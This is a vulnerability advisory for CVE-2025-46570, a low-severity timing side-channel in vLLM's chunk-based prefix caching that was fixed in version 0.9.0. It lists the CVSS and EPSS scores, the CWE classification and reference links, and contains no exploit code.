CVE-2025-46570: vLLM’s Chunk-Based Prefix Caching Vulnerable to Potential Timing Side-Channel

2.6 CVSS

Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

Classification

CVE ID: CVE-2025-46570

CVSS Base Severity: LOW

CVSS Base Score: 2.6

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

Problem Types

CWE-208: Observable Timing Discrepancy

Affected Products

Vendor: vllm-project

Product: vllm

Exploit Prediction Scoring System (EPSS)

EPSS Score: 0.03% (probability of being exploited)

EPSS Percentile: 5.86% (scored less or equal to compared to others)

EPSS Date: 2025-05-30 (when was this score calculated)

References

https://nvd.nist.gov/vuln/detail/CVE-2025-46570
https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r
https://github.com/vllm-project/vllm/pull/17045
https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f

Timeline